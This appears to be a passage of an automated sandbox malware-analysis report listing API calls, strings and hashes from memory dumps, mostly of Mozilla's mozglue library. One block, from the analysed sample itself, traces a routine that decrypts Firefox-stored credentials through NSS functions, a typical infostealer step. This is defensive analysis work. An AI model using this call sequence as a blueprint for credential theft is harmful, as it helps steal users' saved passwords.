                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
                                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                                              • API String ID: 290179723-2746444292
                                                                                                                                                                                                                              • Opcode ID: 41479cef8a5c9aecd6e09b4489b3923e20feaa3a9f4869287a7cb2bf691645dc
                                                                                                                                                                                                                              • Instruction ID: 73c61e8ba5a8dc1476e9405ea3ca2cedb9e625e59725b195d49d801d7aee7c3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41479cef8a5c9aecd6e09b4489b3923e20feaa3a9f4869287a7cb2bf691645dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64F19F71D01365AFEB209F65DC88BAAB7B9FF49700F044199E915A7240E779ED80CFA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strchr.VCRUNTIME140(00000000,0000002E), ref: 6BB9BC5A
                                                                                                                                                                                                                              • strchr.VCRUNTIME140(00000001,0000002E), ref: 6BB9BC6E
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(accelerator.dll,?), ref: 6BB9BC9E
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000110), ref: 6BB9BE33
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB9BE65
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB9BE71
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB9BE7D
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB9BE89
                                                                                                                                                                                                                              • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BB9BE97
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000110), ref: 6BB9BEE4
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB9BF15
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB9BF21
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB9BF2D
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB9BF39
                                                                                                                                                                                                                              • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BB9BF47
                                                                                                                                                                                                                                • Part of subcall function 6BBDAAE0: GetCurrentThreadId.KERNEL32 ref: 6BBDAAF8
                                                                                                                                                                                                                                • Part of subcall function 6BBDAAE0: EnterCriticalSection.KERNEL32(6BBFF770,?,6BB9BF9F), ref: 6BBDAB08
                                                                                                                                                                                                                                • Part of subcall function 6BBDAAE0: LeaveCriticalSection.KERNEL32(6BBFF770,?,?,?,?,?,?,?,?,6BB9BF9F), ref: 6BBDAB6B
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6BB9BFF0
                                                                                                                                                                                                                              • _strtoui64.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000010), ref: 6BB9C014
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: CreateFileW.KERNEL32 ref: 6BBDAC52
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: CreateFileMappingW.KERNEL32 ref: 6BBDAC7D
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: GetSystemInfo.KERNEL32 ref: 6BBDAC98
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: MapViewOfFile.KERNEL32 ref: 6BBDACB0
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: GetSystemInfo.KERNEL32 ref: 6BBDACCD
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: MapViewOfFile.KERNEL32 ref: 6BBDAD05
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: UnmapViewOfFile.KERNEL32 ref: 6BBDAD1C
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: CloseHandle.KERNEL32 ref: 6BBDAD28
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: UnmapViewOfFile.KERNEL32 ref: 6BBDAD37
                                                                                                                                                                                                                                • Part of subcall function 6BBDAC20: CloseHandle.KERNEL32 ref: 6BBDAD43
                                                                                                                                                                                                                                • Part of subcall function 6BBDAE70: GetCurrentThreadId.KERNEL32 ref: 6BBDAE85
                                                                                                                                                                                                                                • Part of subcall function 6BBDAE70: EnterCriticalSection.KERNEL32(6BBFF770,?,6BB9C034), ref: 6BBDAE96
                                                                                                                                                                                                                                • Part of subcall function 6BBDAE70: LeaveCriticalSection.KERNEL32(6BBFF770,?,?,?,?,6BB9C034), ref: 6BBDAEBD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/, xrefs: 6BB9BDDD
                                                                                                                                                                                                                              • LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?), xrefs: 6BB9BFCF
                                                                                                                                                                                                                              • LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag, xrefs: 6BB9BF5B
                                                                                                                                                                                                                              • accelerator.dll, xrefs: 6BB9BC8E, 6BB9BC9D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConditionMask$File$CriticalInfoSectionView$CloseCreateCurrentEnterHandleLeaveSystemThreadUnmapVerifyVersionmemsetstrchr$Mapping_strtoui64freestrcmp
                                                                                                                                                                                                                              • String ID: LdrLoadDll: Blocking load of '%s' (SearchPathW didn't find it?)$LdrLoadDll: Blocking load of '%s' -- see http://www.mozilla.com/en-US/blocklist/$LdrLoadDll: Ignoring the REDIRECT_TO_NOOP_ENTRYPOINT flag$accelerator.dll
                                                                                                                                                                                                                              • API String ID: 3889411031-3373514183
                                                                                                                                                                                                                              • Opcode ID: e329a3fdb483f0ce375f15d9e35bf9e41058c33cefc3dc8feb84da872f145ea8
                                                                                                                                                                                                                              • Instruction ID: 23f17428efdef73bc607932986672bfed239229d5621bda6e17e00d7a382360e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e329a3fdb483f0ce375f15d9e35bf9e41058c33cefc3dc8feb84da872f145ea8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4EE1E9719043809FE720AF34E885B6EB7F9EF86714F00493DE99587280DB78E985CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BBB7090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6BBBB9F1,?), ref: 6BBB7107
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BBBDCF5), ref: 6BBBE92D
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEA4F
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEA5C
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEA80
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEA8A
                                                                                                                                                                                                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6BBBDCF5), ref: 6BBBEA92
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEB11
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEB1E
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BBBEB3C
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEB5B
                                                                                                                                                                                                                                • Part of subcall function 6BBB5710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6BBBEB71), ref: 6BBB57AB
                                                                                                                                                                                                                                • Part of subcall function 6BBACBE8: GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
                                                                                                                                                                                                                                • Part of subcall function 6BBACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6BB84A68), ref: 6BBB945E
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6BBB9470
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6BBB9482
                                                                                                                                                                                                                                • Part of subcall function 6BBB9420: __Init_thread_footer.LIBCMT ref: 6BBB949F
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEBA4
                                                                                                                                                                                                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BBBEBAC
                                                                                                                                                                                                                                • Part of subcall function 6BBB94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6BBB94EE
                                                                                                                                                                                                                                • Part of subcall function 6BBB94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6BBB9508
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBEBC1
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8,?,?,00000000), ref: 6BBBEBCE
                                                                                                                                                                                                                              • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BBBEBE5
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8,00000000), ref: 6BBBEC37
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BBBEC46
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BBBEC55
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6BBBEC5C
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BBBEA9B
                                                                                                                                                                                                                              • [I %d/%d] profiler_start, xrefs: 6BBBEBB4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
                                                                                                                                                                                                                              • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
                                                                                                                                                                                                                              • API String ID: 1341148965-1186885292
                                                                                                                                                                                                                              • Opcode ID: 4a90c74989cf8b25e300b5804f3530bdd70cbf42772ea8c5fe6347b079c7cd6b
                                                                                                                                                                                                                              • Instruction ID: 101fa41c32a36bf59163e18ff9e1925a8de648ba0047996795f17332850e5537
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a90c74989cf8b25e300b5804f3530bdd70cbf42772ea8c5fe6347b079c7cd6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5A13735A00684DFDB209F28E884B7E77AEFF86314F104469EA1987351DF7AD845CB62
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6BB84196
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BB841F1
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB84223
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB8422A
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB84231
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB84238
                                                                                                                                                                                                                              • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BB84245
                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6BB84263
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6BB8427A
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 6BB84299
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000114), ref: 6BB842C4
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB842F6
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB84302
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB84309
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB84310
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB84317
                                                                                                                                                                                                                              • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6BB84324
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
                                                                                                                                                                                                                              • String ID: SetProcessDpiAwareness$Shcore.dll
                                                                                                                                                                                                                              • API String ID: 3038791930-999387375
                                                                                                                                                                                                                              • Opcode ID: f90945ea188ad1d4f2e5752c3d3897c3cb218386f47c77af3cbedaba1fa515e7
                                                                                                                                                                                                                              • Instruction ID: e9b9a156aaf90816097b9fd4d68914d3890b8d64580c6895ab4beee02e6c7ea5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f90945ea188ad1d4f2e5752c3d3897c3cb218386f47c77af3cbedaba1fa515e7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE51F171A44254ABEB106B74DC49FBEB7ACEF86B50F014568F9059B1C0DB79DD40CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NSS_Init.NSS3(00000000), ref: 0040C112
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,042F67A8,00000000,?,0041DBAC,00000000,?,?), ref: 0040C1D6
                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040C1F3
                                                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C1FF
                                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040C212
                                                                                                                                                                                                                                • Part of subcall function 00414FF0: malloc.MSVCRT ref: 00414FF8
                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040C242
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,042F6838,0041D72E), ref: 0040C260
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,042F6B50), ref: 0040C287
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,042F7240,00000000,?,0041DBB8,00000000,?,00000000,00000000,?,042F0858,00000000,?,0041DBB4,00000000,?), ref: 0040C405
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,042F73C0), ref: 0040C41C
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memset.MSVCRT ref: 0040BFC3
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,042F0958), ref: 0040BFE1
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: memcpy.MSVCRT ref: 0040C082
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: PK11_FreeSlot.NSS3(?), ref: 0040C0D1
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,042F73C0,00000000,?,0041DBBC,00000000,?,00000000,042F0958), ref: 0040C4BD
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,042F0818), ref: 0040C4D4
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
                                                                                                                                                                                                                                • Part of subcall function 0040BF90: lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040C5A7
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C5F9
                                                                                                                                                                                                                              • NSS_Shutdown.NSS3 ref: 0040C607
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmallocmemcpymemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2844179199-3916222277
                                                                                                                                                                                                                              • Opcode ID: ef7cd0e1ef472e523f106152c5b9b463d5d6bb522bd6ea9a4f432336a72a88b3
                                                                                                                                                                                                                              • Instruction ID: 16cc530deb27457f536659a64f134916331f5af867ee6c6bf2a367595298ef92
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ef7cd0e1ef472e523f106152c5b9b463d5d6bb522bd6ea9a4f432336a72a88b3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66E11075910208ABCB14EBA1DC91FEEBB79BF54304F41415EF10667191DF38AA86CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBFADC
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBFAE9
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBFB31
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBFB43
                                                                                                                                                                                                                              • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6BBBFBF6
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBFC50
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6BBBFD15
                                                                                                                                                                                                                              • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6BBBFC94
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                                                                                                                                                                                              • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
                                                                                                                                                                                                                              • API String ID: 2101194506-3679350629
                                                                                                                                                                                                                              • Opcode ID: 07869a3a2af1825ba763bbbaf8805ff6df9ae16c647f72af784964caea031c52
                                                                                                                                                                                                                              • Instruction ID: 637269886f08747a6b1f92ea06d3db198c7c1f2d88803413f6afdb0b1fcd69f7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07869a3a2af1825ba763bbbaf8805ff6df9ae16c647f72af784964caea031c52
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1171DD38904780CFD724DF28D445B7EB7E9FF86704F01446AE9458B352EB7AA845CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFE768,?,00003000,00000004), ref: 6BB73AC5
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE768,?,00003000,00000004), ref: 6BB73AE5
                                                                                                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6BB73AFB
                                                                                                                                                                                                                              • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6BB73B57
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFE784), ref: 6BB73B81
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE784), ref: 6BB73BA3
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFE7B8), ref: 6BB73BAE
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE7B8), ref: 6BB73C74
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFE784), ref: 6BB73C8B
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE784), ref: 6BB73C9F
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE7B8), ref: 6BB73D5C
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFE784), ref: 6BB73D67
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFE784), ref: 6BB73D8A
                                                                                                                                                                                                                                • Part of subcall function 6BBB0D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6BB73DEF), ref: 6BBB0D71
                                                                                                                                                                                                                                • Part of subcall function 6BBB0D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6BB73DEF), ref: 6BBB0D84
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
